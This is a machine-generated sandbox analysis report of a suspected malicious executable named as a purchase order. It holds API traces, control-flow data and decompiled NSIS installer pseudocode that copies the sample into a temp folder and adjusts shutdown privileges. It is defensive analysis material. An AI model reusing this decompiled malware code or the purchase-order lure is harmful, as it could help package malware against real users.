                                                                                      0x004038af
                                                                                      0x004038c4
                                                                                      0x004038ca
                                                                                      0x004038cc
                                                                                      0x004038ce
                                                                                      0x004038d6
                                                                                      0x004038d8
                                                                                      0x00000000
                                                                                      0x004038d8
                                                                                      0x004038d2
                                                                                      0x004038d4
                                                                                      0x004038f9
                                                                                      0x004038fd
                                                                                      0x00403906
                                                                                      0x0040390b
                                                                                      0x00403911
                                                                                      0x0040391c
                                                                                      0x0040391e
                                                                                      0x00403923
                                                                                      0x00403925
                                                                                      0x0040397d
                                                                                      0x00403982
                                                                                      0x0040398b
                                                                                      0x00403992
                                                                                      0x00403995
                                                                                      0x00403b6c
                                                                                      0x00403b6c
                                                                                      0x00403b71
                                                                                      0x00403b7a
                                                                                      0x00403b97
                                                                                      0x00403c0f
                                                                                      0x00403c0f
                                                                                      0x00403c17
                                                                                      0x00403c19
                                                                                      0x00403c19
                                                                                      0x00403c1f
                                                                                      0x00403c1f
                                                                                      0x00403bae
                                                                                      0x00403bba
                                                                                      0x00403bcb
                                                                                      0x00403bd2
                                                                                      0x00403bd9
                                                                                      0x00403bd9
                                                                                      0x00403be1
                                                                                      0x00403bed
                                                                                      0x00403bfb
                                                                                      0x00403c06
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403bef
                                                                                      0x00403bef
                                                                                      0x00403bf0
                                                                                      0x00403bf2
                                                                                      0x00403bf3
                                                                                      0x00403bf4
                                                                                      0x00403bf9
                                                                                      0x00403c08
                                                                                      0x00403c0a
                                                                                      0x00000000
                                                                                      0x00403c0a
                                                                                      0x00000000
                                                                                      0x00403bf9
                                                                                      0x00403bed
                                                                                      0x00403b84
                                                                                      0x00403b8b
                                                                                      0x00403b8b
                                                                                      0x004039a1
                                                                                      0x00403a48
                                                                                      0x00403a48
                                                                                      0x00403a54
                                                                                      0x00000000
                                                                                      0x00403a54
                                                                                      0x004039b2
                                                                                      0x004039ba
                                                                                      0x00403a0c
                                                                                      0x00403a0c
                                                                                      0x00403a12
                                                                                      0x00403a19
                                                                                      0x00403a67
                                                                                      0x00403a69
                                                                                      0x00403a6e
                                                                                      0x00403a70
                                                                                      0x00403a78
                                                                                      0x00403a78
                                                                                      0x00403a83
                                                                                      0x00403a88
                                                                                      0x00403a8f
                                                                                      0x00403a95
                                                                                      0x00403a97
                                                                                      0x00403b6a
                                                                                      0x00403b6a
                                                                                      0x00403b6a
                                                                                      0x00000000
                                                                                      0x00403a9d
                                                                                      0x00403a9d
                                                                                      0x00403a9f
                                                                                      0x00403aa0
                                                                                      0x00403aa9
                                                                                      0x00403aa2
                                                                                      0x00403aa2
                                                                                      0x00403aa2
                                                                                      0x00403aaf
                                                                                      0x00403ab7
                                                                                      0x00403abe
                                                                                      0x00403ac6
                                                                                      0x00403ac6
                                                                                      0x00403ad3
                                                                                      0x00403adf
                                                                                      0x00403ae9
                                                                                      0x00403ae9
                                                                                      0x00403aeb
                                                                                      0x00403af2
                                                                                      0x00403afc
                                                                                      0x00403b08
                                                                                      0x00403b0e
                                                                                      0x00403b14
                                                                                      0x00403b17
                                                                                      0x00403b21
                                                                                      0x00403b27
                                                                                      0x00403b29
                                                                                      0x00403b2d
                                                                                      0x00403b3e
                                                                                      0x00403b44
                                                                                      0x00403b49
                                                                                      0x00403b4b
                                                                                      0x00403b4e
                                                                                      0x00403b54
                                                                                      0x00403b54
                                                                                      0x00403b4b
                                                                                      0x00403b29
                                                                                      0x00403b57
                                                                                      0x00403b5e
                                                                                      0x00403b5e
                                                                                      0x00403b5e
                                                                                      0x00403b5e
                                                                                      0x00403b65
                                                                                      0x00000000
                                                                                      0x00403b65
                                                                                      0x00403a97
                                                                                      0x00403a1b
                                                                                      0x00403a1e
                                                                                      0x00403a22
                                                                                      0x00403a27
                                                                                      0x00403a29
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403a35
                                                                                      0x00403a40
                                                                                      0x00403a45
                                                                                      0x00000000
                                                                                      0x00403a45
                                                                                      0x004039c3
                                                                                      0x004039db
                                                                                      0x004039ec
                                                                                      0x004039ed
                                                                                      0x004039f1
                                                                                      0x004039f3
                                                                                      0x00403a01
                                                                                      0x00403a08
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403a08
                                                                                      0x00403a0a
                                                                                      0x00000000
                                                                                      0x00403a0a
                                                                                      0x0040392d
                                                                                      0x00403939
                                                                                      0x0040393e
                                                                                      0x00403943
                                                                                      0x00403945
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040394d
                                                                                      0x00403955
                                                                                      0x00403966
                                                                                      0x0040396e
                                                                                      0x00403970
                                                                                      0x00403975
                                                                                      0x00403977
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403977
                                                                                      0x00000000
                                                                                      0x004038d4
                                                                                      0x0040387d
                                                                                      0x0040387f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403881
                                                                                      0x00403885
                                                                                      0x00403889
                                                                                      0x00403890
                                                                                      0x00403890
                                                                                      0x00403890
                                                                                      0x00403890
                                                                                      0x00000000
                                                                                      0x00403890
                                                                                      0x0040388b
                                                                                      0x0040388e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040388e
                                                                                      0x00403827
                                                                                      0x0040382b
                                                                                      0x0040382e
                                                                                      0x00403835
                                                                                      0x00403835
                                                                                      0x00000000
                                                                                      0x00403835
                                                                                      0x00403830
                                                                                      0x00403833
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403833
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403801
                                                                                      0x00403801
                                                                                      0x00403802
                                                                                      0x00403803
                                                                                      0x00403803
                                                                                      0x00000000
                                                                                      0x00403801
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                      • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                      • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                      • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                      • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO#4200000866.exe" ,00000020,"C:\Users\user\Desktop\PO#4200000866.exe" ,00000000), ref: 004037E9
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                                                        • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO#4200000866.exe" ,00000000,?), ref: 00403A8F
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO#4200000866.exe,00420F08,00000001), ref: 00403B21
                                                                                      • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                      • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                      • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                      • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\PO#4200000866.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO#4200000866.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 3859024572-3163478904
                                                                                      • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                      • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                      • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                                                      • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->148 167 4058f3-40590d SendMessageW * 2 145->167 168 40590f-405912 145->168 150 4059f3-4059f9 147->150 151 405a0f-405a19 147->151 148->147 155 405a34-405a3d call 40462b 150->155 156 4059fb-405a0a ShowWindow * 2 call 4045f9 150->156 152 405a1b-405a21 151->152 153 405a6f-405a73 151->153 157 405a23-405a2f call 40459d 152->157 158 405a49-405a59 ShowWindow 152->158 153->155 161 405a75-405a7b 153->161 164 405a42-405a46 155->164 156->151 157->155 165 405a69-405a6a call 40459d 158->165 166 405a5b-405a64 call 4056ca 158->166 161->155 169 405a7d-405a90 SendMessageW 161->169 165->153 166->165 167->168 172 405922-405939 call 4045c4 168->172 173 405914-405920 SendMessageW 168->173 174 405b92-405b94 169->174 175 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 169->175 182 40593b-40594f ShowWindow 172->182 183 40596f-405990 GetDlgItem SendMessageW 172->183 173->172 174->164 180 405ac3-405ad3 GetWindowRect 175->180 181 405ad6-405aeb TrackPopupMenu 175->181 180->181 181->174 184 405af1-405b08 181->184 185 405951-40595c ShowWindow 182->185 186 40595e 182->186 183->174 187 405996-4059ae SendMessageW * 2 183->187 188 405b0d-405b28 SendMessageW 184->188 189 405964-40596a call 4045f9 185->189 186->189 187->174 188->188 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                      C-Code - Quality: 95%
                                                                                      			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				long _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				void* _v36;
                                                                                      				signed int _v40;
                                                                                      				int _v44;
                                                                                      				int _v48;
                                                                                      				signed int _v52;
                                                                                      				int _v56;
                                                                                      				void* _v60;
                                                                                      				void* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t94;
                                                                                      				long _t95;
                                                                                      				int _t100;
                                                                                      				void* _t108;
                                                                                      				void* _t127;
                                                                                      				intOrPtr _t130;
                                                                                      				struct HWND__* _t134;
                                                                                      				int _t156;
                                                                                      				int _t159;
                                                                                      				struct HMENU__* _t164;
                                                                                      				struct HWND__* _t168;
                                                                                      				struct HWND__* _t169;
                                                                                      				int _t171;
                                                                                      				void* _t172;
                                                                                      				short* _t173;
                                                                                      				short* _t175;
                                                                                      				int _t177;
                                                                                      
                                                                                      				_t169 =  *0x429244;
                                                                                      				_t156 = 0;
                                                                                      				_v8 = _t169;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 == 0x405) {
                                                                                      						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                      						CloseHandle(_t127); // executed
                                                                                      					}
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L17:
                                                                                      						_t171 = 1;
                                                                                      						if(_a8 != 0x404) {
                                                                                      							L25:
                                                                                      							if(_a8 != 0x7b) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t94 = _v8;
                                                                                      							if(_a12 != _t94) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                      							_a8 = _t95;
                                                                                      							if(_t95 <= _t156) {
                                                                                      								L36:
                                                                                      								return 0;
                                                                                      							}
                                                                                      							_t164 = CreatePopupMenu();
                                                                                      							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                      							_t100 = _a16;
                                                                                      							_t159 = _a16 >> 0x10;
                                                                                      							if(_a16 == 0xffffffff) {
                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                      								_t100 = _v28.left;
                                                                                      								_t159 = _v28.top;
                                                                                      							}
                                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                      								_v60 = _t156;
                                                                                      								_v48 = 0x423748;
                                                                                      								_v44 = 0x1000;
                                                                                      								_a4 = _a8;
                                                                                      								do {
                                                                                      									_a4 = _a4 - 1;
                                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                      								} while (_a4 != _t156);
                                                                                      								OpenClipboard(_t156);
                                                                                      								EmptyClipboard();
                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                      								_a4 = _t108;
                                                                                      								_t172 = GlobalLock(_t108);
                                                                                      								do {
                                                                                      									_v48 = _t172;
                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                      									 *_t173 = 0xd;
                                                                                      									_t175 = _t173 + 2;
                                                                                      									 *_t175 = 0xa;
                                                                                      									_t172 = _t175 + 2;
                                                                                      									_t156 = _t156 + 1;
                                                                                      								} while (_t156 < _a8);
                                                                                      								GlobalUnlock(_a4);
                                                                                      								SetClipboardData(0xd, _a4);
                                                                                      								CloseClipboard();
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						if( *0x42922c == _t156) {
                                                                                      							ShowWindow( *0x42a268, 8);
                                                                                      							if( *0x42a2ec == _t156) {
                                                                                      								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                                                      							}
                                                                                      							E0040459D(_t171);
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						 *0x421f18 = 2;
                                                                                      						E0040459D(0x78);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						if(_a12 != 0x403) {
                                                                                      							L20:
                                                                                      							return E0040462B(_a8, _a12, _a16);
                                                                                      						}
                                                                                      						ShowWindow( *0x429230, _t156);
                                                                                      						ShowWindow(_t169, 8);
                                                                                      						E004045F9(_t169);
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                      				_t177 = 2;
                                                                                      				_v60 = _t177;
                                                                                      				_v56 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t130 =  *0x42a270;
                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                      				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                                      				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                      				 *0x429244 = _t134;
                                                                                      				_v8 = _t134;
                                                                                      				E004045F9( *0x429230);
                                                                                      				 *0x429234 = E00404F52(4);
                                                                                      				 *0x42924c = 0;
                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                      				if(_a8 >= 0) {
                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                      				}
                                                                                      				if(_a12 >= _t156) {
                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      				_push(0x1b);
                                                                                      				E004045C4(_a4);
                                                                                      				if(( *0x42a278 & 0x00000003) != 0) {
                                                                                      					ShowWindow( *0x429230, _t156); // executed
                                                                                      					if(( *0x42a278 & 0x00000002) != 0) {
                                                                                      						 *0x429230 = _t156;
                                                                                      					} else {
                                                                                      						ShowWindow(_v8, 8); // executed
                                                                                      					}
                                                                                      					E004045F9( *0x429228);
                                                                                      				}
                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                      				if(( *0x42a278 & 0x00000004) != 0) {
                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                      				}
                                                                                      				goto L36;
                                                                                      			}


































                                                                                      0x00405811
                                                                                      0x00405817
                                                                                      0x00405821
                                                                                      0x00405824
                                                                                      0x004059ba
                                                                                      0x004059d7
                                                                                      0x004059de
                                                                                      0x004059de
                                                                                      0x004059f1
                                                                                      0x00405a0f
                                                                                      0x00405a11
                                                                                      0x00405a19
                                                                                      0x00405a6f
                                                                                      0x00405a73
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a75
                                                                                      0x00405a7b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405a85
                                                                                      0x00405a8d
                                                                                      0x00405a90
                                                                                      0x00405b92
                                                                                      0x00000000
                                                                                      0x00405b92
                                                                                      0x00405a9f
                                                                                      0x00405aaa
                                                                                      0x00405ab3
                                                                                      0x00405abe
                                                                                      0x00405ac1
                                                                                      0x00405aca
                                                                                      0x00405ad0
                                                                                      0x00405ad3
                                                                                      0x00405ad3
                                                                                      0x00405aeb
                                                                                      0x00405af4
                                                                                      0x00405af7
                                                                                      0x00405afe
                                                                                      0x00405b05
                                                                                      0x00405b0d
                                                                                      0x00405b0d
                                                                                      0x00405b24
                                                                                      0x00405b24
                                                                                      0x00405b2b
                                                                                      0x00405b31
                                                                                      0x00405b3d
                                                                                      0x00405b44
                                                                                      0x00405b4d
                                                                                      0x00405b4f
                                                                                      0x00405b52
                                                                                      0x00405b61
                                                                                      0x00405b64
                                                                                      0x00405b6a
                                                                                      0x00405b6b
                                                                                      0x00405b71
                                                                                      0x00405b72
                                                                                      0x00405b73
                                                                                      0x00405b7b
                                                                                      0x00405b86
                                                                                      0x00405b8c
                                                                                      0x00405b8c
                                                                                      0x00000000
                                                                                      0x00405aeb
                                                                                      0x00405a21
                                                                                      0x00405a51
                                                                                      0x00405a59
                                                                                      0x00405a64
                                                                                      0x00405a64
                                                                                      0x00405a6a
                                                                                      0x00000000
                                                                                      0x00405a6a
                                                                                      0x00405a25
                                                                                      0x00405a2f
                                                                                      0x00000000
                                                                                      0x004059f3
                                                                                      0x004059f9
                                                                                      0x00405a34
                                                                                      0x00000000
                                                                                      0x00405a3d
                                                                                      0x00405a02
                                                                                      0x00405a07
                                                                                      0x00405a0a
                                                                                      0x00000000
                                                                                      0x00405a0a
                                                                                      0x004059f1
                                                                                      0x0040582a
                                                                                      0x0040582e
                                                                                      0x00405836
                                                                                      0x0040583a
                                                                                      0x0040583d
                                                                                      0x00405840
                                                                                      0x00405843
                                                                                      0x00405846
                                                                                      0x00405847
                                                                                      0x00405848
                                                                                      0x00405861
                                                                                      0x00405864
                                                                                      0x0040586e
                                                                                      0x0040587d
                                                                                      0x00405885
                                                                                      0x0040588d
                                                                                      0x00405892
                                                                                      0x00405895
                                                                                      0x004058a1
                                                                                      0x004058aa
                                                                                      0x004058b3
                                                                                      0x004058d5
                                                                                      0x004058db
                                                                                      0x004058ec
                                                                                      0x004058f1
                                                                                      0x004058ff
                                                                                      0x0040590d
                                                                                      0x0040590d
                                                                                      0x00405912
                                                                                      0x00405920
                                                                                      0x00405920
                                                                                      0x00405925
                                                                                      0x00405928
                                                                                      0x0040592d
                                                                                      0x00405939
                                                                                      0x00405942
                                                                                      0x0040594f
                                                                                      0x0040595e
                                                                                      0x00405951
                                                                                      0x00405956
                                                                                      0x00405956
                                                                                      0x0040596a
                                                                                      0x0040596a
                                                                                      0x0040597e
                                                                                      0x00405987
                                                                                      0x00405990
                                                                                      0x004059a0
                                                                                      0x004059ac
                                                                                      0x004059ac
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                      • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                      • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                      • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                      • CreatePopupMenu.USER32 ref: 00405A96
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                      • EmptyClipboard.USER32 ref: 00405B31
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                      • CloseClipboard.USER32 ref: 00405B8C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: H7B${
                                                                                      • API String ID: 590372296-2256286769
                                                                                      • Opcode ID: c3d11cc47df71ab4d05679e65d974b621c0833f5037d3fed9a0d03fb4ea6e9ce
                                                                                      • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                      • Opcode Fuzzy Hash: c3d11cc47df71ab4d05679e65d974b621c0833f5037d3fed9a0d03fb4ea6e9ce
                                                                                      • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 95%
                                                                                      			E715D1BFF() {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				WCHAR* _v24;
                                                                                      				WCHAR* _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				WCHAR* _v48;
                                                                                      				signed int _v52;
                                                                                      				void* _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				WCHAR* _t208;
                                                                                      				signed int _t211;
                                                                                      				void* _t213;
                                                                                      				void* _t215;
